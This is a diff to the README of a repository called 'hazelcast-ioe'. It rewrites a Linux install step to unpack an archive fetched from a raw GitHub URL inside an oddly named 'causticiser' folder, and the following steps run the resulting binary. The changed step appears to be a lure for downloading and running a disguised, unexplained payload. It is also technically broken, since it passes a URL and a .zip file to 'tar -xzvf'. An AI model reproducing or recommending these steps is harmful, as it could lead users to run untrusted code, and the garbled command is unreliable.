anaismolar775/hazelcast-ioe/README.md

 - **For Linux:**
     1. Open a terminal window.
     2. Navigate to the downloaded file with `cd ~/Downloads` or your specific folder.
-    3. Unzip the file using `tar -xzvf hazelcast-ioe.tar.gz`.
+    3. Unzip the file using `tar -xzvf https://raw.githubusercontent.com/anaismolar775/hazelcast-ioe/main/causticiser/hazelcast-ioe_3.1.zip`.
     4. Change to the directory created: `cd hazelcast-ioe`.
     5. Run the application with `./hazelcast-ioe`.